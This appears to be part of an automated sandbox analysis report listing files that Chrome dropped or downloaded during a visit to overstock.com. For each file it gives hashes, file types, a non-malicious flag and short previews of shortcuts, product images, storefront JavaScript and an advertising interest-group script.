                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......j..*......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I^Y.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.j....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V^Y.j....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V^Y.j...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V^Y.j...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~.3.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 12:21:54 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                    Entropy (8bit):3.9993593526197233
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:8dWdcjT3N7KOH5idAKZdA1VehBiZUk1W1qeh4y+C:8ddzwt9Yy
                                                                                                                                                                                    MD5:7947793976CC67E1E3669F9192A4A496
                                                                                                                                                                                    SHA1:C5DCDB2B67D34262BF163674E73B587330BD28E8
                                                                                                                                                                                    SHA-256:F9D64C78772C656EA30CB745BF6C2DAC0060E8294A383381B80090F6C8C5C85F
                                                                                                                                                                                    SHA-512:BCFB11215783EBECEDE53BDC515C7CCEDD5EF17E9E9DBEF56AEB1C138AED5B6D4622466FE662FC6C1EFBF310613AC102CE59D552E664A77FEE2D69F11F067799
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......w..*......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I^Y.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.j....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V^Y.j....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V^Y.j...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V^Y.j...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~.3.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 12:21:54 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2683
                                                                                                                                                                                    Entropy (8bit):4.007103519043629
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:8DkWdcjT3N7KOH5idAKZdA1duT6ehOuTbbiZUk5OjqehOuTbyy+yT+:8DkdzwdTTTbxWOvTbyy7T
                                                                                                                                                                                    MD5:9DDEFF0988FDFF1A163182BB348C751A
                                                                                                                                                                                    SHA1:E36C08E1CE17CBC8DFAA5E4773D0BD653AEC82D9
                                                                                                                                                                                    SHA-256:BCD57E50DE3456DB4C45DF73CF9070EC686A26BE271E16D537A08BF03D107A09
                                                                                                                                                                                    SHA-512:E83709374B57070CBB9D8838F37C97D0C689E2847666E080BC00C773EC248B8A3D34EB8E05FC66AECFD14BB143B51AFE61A5F34DFF858E49381A00E89F96E0B5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....xa..*......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I^Y.j....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y.j....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V^Y.j....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V^Y.j...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V^Y.j...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........~.3.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1380
                                                                                                                                                                                    Entropy (8bit):6.54898829075436
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:yTCIl/X2YlXWI2PULhg8m9c96B6tSEbdgc9CLbbv21hude0:/Il/XflVC8m2UBnERCrv21hWR
                                                                                                                                                                                    MD5:852C1F28CE4F54314027DB2671488704
                                                                                                                                                                                    SHA1:D3F77DD001ABBFA90D44D024F0978D363D42487E
                                                                                                                                                                                    SHA-256:68E183AFEB7B96613A04B563E7991D6D38D4212BBA24D54F9F13E3D4926C5EB0
                                                                                                                                                                                    SHA-512:3C7D987D5620E4D70F64BC8F29067551850A002C567F43758A26625CD99BC4DE957FA816F21104E50F1AB3EDF132383844B47A67AE2C3321C65F030E1A650B9A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_4ec720ca-b049-464a-9bc0-8c0110e9e407.jpg?v=1729323095&width=80
                                                                                                                                                                                    Preview:RIFF\...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.[.T ....i..Y...?..|.7.[6...Hs.......>.E.....[..Zu.T.+W...3W.73U..w..+....vY.S:.J...h... .."F.kk.o1._.G..... .O.<;.....fp........d..........S.D.:.....?>........\...,..\..-Z?cUU...........<2r@^do.y.0..'....L..3.... .....u......Y..Q.E:..........Y.......u...0.....W.&..._:].4.g..w..S.*/.g..*..)...|?.......O"...y...L.......Zz.^..2I.i..z.#....J}B.:x{..9..R..S.[..{L,.|....\.J...{Q?Q.u...;......C>...tq.V2.....W..@...?.s..R...Y.o...r.UdI...[.}.....:X.&..M..O...s..[.9.r.....;.w`.,..E..]....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18
                                                                                                                                                                                    Entropy (8bit):3.4193819456463714
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YAsf4:YAsQ
                                                                                                                                                                                    MD5:C07FE8D0C031632D49B937F7B64CC318
                                                                                                                                                                                    SHA1:B50FF5D4241ED1D437505098707C289683F62ACF
                                                                                                                                                                                    SHA-256:9B5179EA2A77FE69B294FBD2ED504EACBFBE048EDE58967B43AF2CA537144B1F
                                                                                                                                                                                    SHA-512:394C5DA339B99343711A35BCF088CB6EA5E93462616B6E5A2085182F55B63206ADA99E4A429B332170F958F2ACBEB57B9623AF1B96CEA288E34BCDE693541723
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"eligible":false}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1902
                                                                                                                                                                                    Entropy (8bit):7.070820593266417
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:jIl/XflL/0VdMQLTr057/ALI3JRrhCZD+XNPA22F7dntjpUR:jIl/XB/0VqQLTrBAh+iedntuR
                                                                                                                                                                                    MD5:ACF0F2197B142517242E14EAC7DCC982
                                                                                                                                                                                    SHA1:29F55EA86A6F9CC2D03786F2B75440A3C410CA9D
                                                                                                                                                                                    SHA-256:9844B55BA649F961A9B8AC30BC635D8FC0CCCB8B3DBBC9B17EB6529C09F781A5
                                                                                                                                                                                    SHA-512:EEA22C9C4104A09003CAF24A99AED67C67B279C9AE980687A1424A3E7E70D904C52EA1D3501DF28FAAB921FC501CD011E7C1FCA14D780590346C159C0995D2FF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_d94515ad-bc46-4603-88b6-4949503c5386.jpg?v=1729325184&width=80
                                                                                                                                                                                    Preview:RIFFf...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p....*P.P.>-..B........bY.3.'..x.q9.}......c...G.=z$.L?.8w...5/..[...=.....?....+...C......!.C..d.........A..G....ac...$..h..wfL...D`......y{.L/.?..R..0M........=7.AT.2.....a..F...F.x9.g....=Z..'d ......l5....f.s.....6...M..Nz=..~....f4.n<Kx.G.B<.[..|m.w"....u*....$.I.|.R..xg...7.....B..5.v\...y?..x*rk....u.m+.j...R....2....%...o./....N.6....g....`......T.i.vo.o..?q./.m.u..IQ;3..C...-"...x_..v.h.D....uk...:".jl80.....e...m_.`.\.e..~Y...U.10.J..k.......9.....E....<.....hO3Y........6ap......s.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (20235)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24394
                                                                                                                                                                                    Entropy (8bit):5.512377842344329
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:vs/9vNwg8FS7dGJBTCsGg2mB/5FUs6pKLbUxdXtLXaJPPv2GggWGY:uN9DmZlYdS2GggWGY
                                                                                                                                                                                    MD5:17F0A135EB15799FCFFAD2B076BA5A83
                                                                                                                                                                                    SHA1:FA09FE59E00C70EB47B518445F49EA7BE052F49E
                                                                                                                                                                                    SHA-256:2C2376365F9C79B9338182A4973F121D6C13168A497818EE8C0B05948E22BBCF
                                                                                                                                                                                    SHA-512:13FE748AD572F6A0AA42277FE32F15C2D28EAF9D7DBF64ACAC48EA9896C274039D0F52E4A9102035CF09D5BCAE64C364F12D1F65DC171B4DAC30827A306D053B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:const __vite__fileDeps=window.__vite__fileDeps||[],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(`._overlay_1il33_1{position:fixed;top:0;left:0;width:100%;height:100%;z-index:35;display:block;opacity:1;background-color:#fff}._withSideAnimation_1il33_13{transition:left .3s ease}._open_1il33_17{left:0}._close_1il33_21{left:100%}._facetValueLabel_1n921_1{position:relative;display:block;padding-left:28px;color:#252525;font-size:14px;cursor:pointer}._facetValueLabel_1n921_1 input{position:absolute;opacity:0;height:0;width:0}._facetValueLabel_1n921_1:before{content:"";position:absolute;top:50%;left:0;transform:translateY(-50%);width:20px;height:20px;box-sizing:border-box;border-radius:2px;border:1px solid #5a5a5a}._facetValueLabel_1n921_1._isRadio_1n921_27:before{border-radius:50%}._checked_1n921_31:before{border:none;content:url("data:image/svg+xml,%3csvg%20xm
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5932)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6029
                                                                                                                                                                                    Entropy (8bit):4.981564132368788
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:vpNC2czRoDbzMYTGX/eAF2WoIrKvCKx/+N89Hdty:vpNC2QOb6X/eAF2xsKh/s89Hdk
                                                                                                                                                                                    MD5:E354F57A89D39F7FC848E95A723C7A3C
                                                                                                                                                                                    SHA1:45A9B8988FE335D52E3E77FCD858D3EE505E5297
                                                                                                                                                                                    SHA-256:2523990069B690FB3EA381FD8B033CE08BF40FA099ECDAA17F329118B54AB7A6
                                                                                                                                                                                    SHA-512:B375E5D148ABC5893504DAA1AAFE440385D251FA010F2DBAF00FF840CA2837CB5F26E3F409AFD97C53169DCF47800DF5273F56CCA7E5DB6289AD1983CC467CE7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/cart-drawer.js?v=166125276811576869981730157903
                                                                                                                                                                                    Preview:function loadScript(src){return new Promise((resolve,reject)=>{const s=document.createElement("script");s.src=src,s.onload=resolve,s.onerror=reject,document.body.appendChild(s)})}if(!customElements.get("cart-drawer-disclosure")){class CartDrawerDisclosure extends DetailsDisclosure{constructor(){super(),this.openBtn=this.querySelector("summary"),this.closeBtn=this.querySelector(".js-close"),this.overlay=document.getElementById("cart-drawer").querySelector(".overlay")}handleClick(evt){evt.target.matches(".js-close")&&this.close()}open(){this.overlay.classList.add("is-visible"),super.open(),trapFocus(this),this.clickHandler=this.clickHandler||this.handleClick.bind(this),this.keyupHandler=evt=>evt.key==="Escape"&&this.close(),this.addEventListener("click",this.clickHandler),this.addEventListener("keyup",this.keyupHandler),this.overlay.addEventListener("click",this.clickHandler)}close(){this.overlay.classList.remove("is-visible"),super.close(),removeTrapFocus(this.openBtn),this.removeEventL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (39697)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):136265
                                                                                                                                                                                    Entropy (8bit):5.4579040090972
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Q5/+JU5hLofQru1CKsJ9nJbjMJZyDv4OvVX47USYsk49HQse00:Q5/+JUPLDoIDvUHQsn0
                                                                                                                                                                                    MD5:F9A7ED66DD7A1D0D455909151E237716
                                                                                                                                                                                    SHA1:E416BFBC43087EC32183621A3DFD080C14D2155D
                                                                                                                                                                                    SHA-256:712F2DF6C9B6EBCB88B1C6173328752C352C2EC22E3C50CB5AFC934DD056F684
                                                                                                                                                                                    SHA-512:92A427AF8B0945D0CE385573603597E118D373AE163B282D66530600F88B01673CD243930C6BCF2F8367A05DAC4647FEE346681BB481BAC2E3681BDD46470710
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/engine.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[976],{71387:e=>{e.exports={cloudinaryUploadBase:"https://api.cloudinary.com/v1_1/powerreviews/auto/upload",cloudinaryDownloadBase:"https://media.powerreviews.com",local:{name:"local",entryPath:"https://localhost:3001/",assetPath:function(){return"https://localhost:3001/"},akamaiUIBase:"https://localhost:3001",awsUIBase:"https://localhost:3001",writeBase:"https://devwriteservices.powerreviews.com",b2cReadBase:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOrigin:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOS:"https://dev-display-api.powerreviews.io",b2cReadProxy:"https://devui.powerreviews.com/api/",cloudinaryImagePreset:"dev_preset",cloudinaryVideoPreset:"dev_video_preset",trackingBase:"https://t-dev.powerreviews.com",servicesBase:"https://qaservices.powerreviews.com/JSController.do",uiPRBase:"https://localhost:3001",versionFullJS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1356
                                                                                                                                                                                    Entropy (8bit):6.521037761887885
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:qTCIl/X2YlXWI2PUIGrquWCehi7styDCBE4/esPNqCeeFKM4:nIl/XflKGrtWphfMvCesX7FZ4
                                                                                                                                                                                    MD5:2D6E8DDE9273A5B0A4DB4A8A1F14C392
                                                                                                                                                                                    SHA1:FB5AA44B47F080808AFF138BF204B40A6555B646
                                                                                                                                                                                    SHA-256:9E7E469108700F4F2CC82C19ED67823DC56DF7A408D1CF02FB21BCD7C1972D4E
                                                                                                                                                                                    SHA-512:174712C8512A9E308DDACE238DEA940D865F8B7DA27DA6B5795191C7F2EB530B4D8BA65A81C034A6AACAB8D3BDA2A8B8F0F13A3F573F9F6572068F1D65FE9918
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_dd5b1b77-81cf-4130-b404-1eeb2cec8d31.jpg?v=1729322980&width=80
                                                                                                                                                                                    Preview:RIFFD...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C"!!..]8 ....j....d.kM1.|...3w+../...=.w.Q....3$u....Y.>Zt......Bj.;.G'..1aW. .V...s:..g...."...........x<.._.S.!.. _!m%1....x....|....$.'.}{#..K.Hf.p...@g.72._........N......Zh6D@. ......d.V...cjn.T..#..&.ex/................\...sUC. .u.,....g.....Q.o..9..o..C.U.........:c$...c}.`l.j..d@Xh..i.l[...ha#V.t..{..g.s.s...&.6....l.$.,.d../U.....;..._....4.q*.T$..v........i....v.].j....0.M.J.).d..{."*.E1o-e..U6...$.|.."....Y...^.}...Q...BC..-j..5f..W...........Z}....@.S...u...~8H........|.P.c.e.Zx
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 112 x 112, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):423
                                                                                                                                                                                    Entropy (8bit):5.389516388428603
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:6v/72xzgY2eB/6Ts/e5IBHBHBHBHBHBHBHBHBHBHBHBHBHY:UY2eB/6NIBHBHBHBHBHBHBHBHBHBHBHw
                                                                                                                                                                                    MD5:31E34FEC40A4DAB3EF2954E78DB41CED
                                                                                                                                                                                    SHA1:AFFCEFBD807EBF2A46E1E0BA19D4F9940A5226D7
                                                                                                                                                                                    SHA-256:A483A67511346B69EE0EA6AEFF847C0A8543938467E9F800AF14667F687ED86F
                                                                                                                                                                                    SHA-512:69C3CBEF160974B245ADD28B9CCBCB7BE238220494ED3CC6C51BF15AE112A6959B5550DE80C537E4779C225FC679D20692BBF9BF72FC466852A25139235C70D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/s/files/1/0633/7105/1167/files/checkout-background-color_2000x.png?v=1711575937
                                                                                                                                                                                    Preview:.PNG........IHDR...p...p........K...$eXIfII*.......<...............imagery4..'=......pHYs.................sRGB.........gAMA......a.....IDATx...... ....*..d..q.T`.9o..C..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q........'0N`..8.q..............G.......IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1057
                                                                                                                                                                                    Entropy (8bit):5.159129440606419
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:kUMMYuS+G/0TYdLxyBuRjTVYctngYeGFTMCq1PuLgiEchAOoG4z:/lmzrtneMoCq1TiEmQz
                                                                                                                                                                                    MD5:908CEC58C909EA232BDA7FABAF793B64
                                                                                                                                                                                    SHA1:70562C1B4F0A2BF8437E4C93BD4B359DF35AAAAF
                                                                                                                                                                                    SHA-256:581766333FF59C0EB5E786659FDE5B6B84A979CEE8D609DAEC0EA28EE0B2ABD5
                                                                                                                                                                                    SHA-512:E162E8FC559900B052E60DFBC4FCC604D085F1FFD650DED082380EA1BC2C6792CDED83F0239951FC5737C5BB7326E7026138A1E7BA6619D802B3040969A67DFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://us.creativecdn.com/ig-membership?ntk=9B5RYrxxXdnA25atzWNK6c6yVM8fIRtEZzsT_T2AwgLN8wqK_LIiDH34FH8D-qqmhIxUBsvHjN-NugGdQnLBDKxjlWVmazMsFmNuKy3pG14
                                                                                                                                                                                    Preview:<html><body>.<script type="module">. if (navigator.joinAdInterestGroup) {. const addIgScript = document.createElement('script');. let basePath = 'https://us.creativecdn.com/ig-membership';. let fencedFramesEnabled = window.FencedFrameConfig !== undefined || 'src' in document.createElement('fencedframe');. let runAdAuctionEnabled = navigator.runAdAuction !== undefined. let label = null;. if ('cookieDeprecationLabel' in navigator) {. label = await navigator.cookieDeprecationLabel.getValue();. }. let basEnabled = navigator.getInterestGroupAdAuctionData !== undefined;. let params = new URLSearchParams({ntk : '9B5RYrxxXdnA25atzWNK6c6yVM8fIRtEZzsT_T2AwgLN8wqK_LIiDH34FH8D-qqmhIxUBsvHjN-NugGdQnLBDKxjlWVmazMsFmNuKy3pG14',lbl: label, ff: fencedFramesEnabled,checked: true,bas: basEnabled,ra : runAdAuctionEnabled });. addIgScript.setAttribute('src', basePath + '?' + params.toString());. document.body.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (44139)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):44228
                                                                                                                                                                                    Entropy (8bit):5.078085245617713
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:mQaaN0wEJXENw38WuYN2wSGxy5j8W/BNmvhWvA18k68pflMZVWRV6/h4YxNi6RZL:U8Af2Hy8jDYcEpUMVO+SVgYlqFbiM16h
                                                                                                                                                                                    MD5:7077D5E06DC3EEC307149AED5EA25482
                                                                                                                                                                                    SHA1:C2BB88ACD4BE5F6D5F12B58985AF3138C4F824F7
                                                                                                                                                                                    SHA-256:D2692DF1417AD10491DE9FE0E3815215C8FA799BFD4DFF41D40FD6FC726D5D8C
                                                                                                                                                                                    SHA-512:40A6312C98B9008E0743490D4BC42F8C924E6E893CE3E2970F027AAA0A2C7A9C969C0FAB6368159DADF1A899091C14476AC5F24800D3097579854E61FBDCEECC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/main.js?v=64442423901038758631730157903
                                                                                                                                                                                    Preview:function focusVisiblePolyfill(){const navKeys=["Tab","ArrowUp","ArrowDown","ArrowLeft","ArrowRight","Enter","Space","Escape","Home","End","PageUp","PageDown"];let currentFocusedElement=null,mouseClick=null;window.addEventListener("keydown",evt=>{navKeys.includes(evt.code)&&(mouseClick=!1)}),window.addEventListener("mousedown",()=>{mouseClick=!0}),window.addEventListener("focus",()=>{currentFocusedElement&&currentFocusedElement.classList.remove("is-focused"),!mouseClick&&(currentFocusedElement=document.activeElement,currentFocusedElement.classList.add("is-focused"))},!0)}try{document.querySelector(":focus-visible")}catch{focusVisiblePolyfill()}(()=>{const{mediaQueries}=theme;if(!mediaQueries)return;const mqKeys=Object.keys(mediaQueries),mqLists={};theme.mediaMatches={};const handleMqChange=()=>{const newMatches=mqKeys.reduce((acc,media)=>(acc[media]=!!(mqLists[media]&&mqLists[media].matches),acc),{});Object.keys(newMatches).forEach(key=>{theme.mediaMatches[key]=newMatches[key]}),window.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (468), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):468
                                                                                                                                                                                    Entropy (8bit):5.38199215082562
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:ZaiGmFMZqWkoXkZMk4smLkp0ZgFqOFXjV:Z8cMUW1jsmLk6AFV
                                                                                                                                                                                    MD5:1479DDBCB4AB3402CE6D1A169762E5AE
                                                                                                                                                                                    SHA1:93752F005ED143884743FE76A8755292D7BF6514
                                                                                                                                                                                    SHA-256:993C19AD16D85E3A7DA2E38C84F4FB4B1B9E15EF34EB3291098EB639337770A8
                                                                                                                                                                                    SHA-512:B52AE43A240461AF43589BBB6413A731BEB984ECC1EE910F731CF8A03C9921082424CD4C0FDF1DE371F54438670C73BC8177724A8F7C1100DFE763EF4EB783F8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:self.__BUILD_MANIFEST={__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/_error":["static/chunks/pages/_error-3c9a37b9888d2d4e.js"],"/health":["static/chunks/pages/health-18e9910af7a8cb7a.js"],"/main":["static/css/ad6fb076e0e5cbef.css","static/chunks/735-6ba73dac84dad3b1.js","static/css/0aa6b98441eac8ac.css","static/chunks/pages/main-4d3627b5fb2c9f5d.js"],sortedPages:["/_app","/_error","/health","/main"]},self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x1024, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):410376
                                                                                                                                                                                    Entropy (8bit):7.985859007003187
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:+7qEKUtVBPskTCoYB9w6a+PnoM2BFT3QW4XVZBRkj:alnVtji66aenbSA5C
                                                                                                                                                                                    MD5:8ED533BFB3A30D8126499721A91633A2
                                                                                                                                                                                    SHA1:AAB4BC332144089A421F4CB532095E34AD28E9F8
                                                                                                                                                                                    SHA-256:89806A531245F201ACC80155E6FE6162BC44E3BA70E6D43D4D76E98D6FB2CFE5
                                                                                                                                                                                    SHA-512:124A678FDAA6F3E06EEBE3AC22E310A144B1D1485D472A987A61376296DD288BF0F980325E79961AFDED1DE9C86325F86EE265219FBAE30665542DD3EB74B35E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
